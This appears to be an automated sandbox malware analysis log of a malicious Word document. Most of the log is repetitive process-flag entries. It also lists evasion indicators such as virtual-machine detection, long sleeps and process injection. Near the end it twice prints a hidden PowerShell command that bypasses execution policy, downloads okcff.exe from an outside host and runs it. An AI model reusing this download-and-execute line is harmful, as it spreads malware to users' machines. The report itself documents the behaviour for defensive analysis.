                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\okcff.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\okcff.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1200Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2932Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2644Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1592Thread sleep time: -33000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1724Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 308Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2292Thread sleep count: 302 > 30
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1012Thread sleep count: 9438 > 30
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108Thread sleep count: 101 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exeWindow / User API: threadDelayed 9438
                    Source: C:\Users\user\AppData\Roaming\okcff.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exeThread delayed: delay time: 30000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: okcff.exe, 00000009.00000002.620634062.000000000079D000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Injects files into Windows applicationShow sources
                    Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Bypasses PowerShell execution policyShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory written: C:\Users\user\AppData\Roaming\okcff.exe base: 400000 value starts with: 4D5A
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
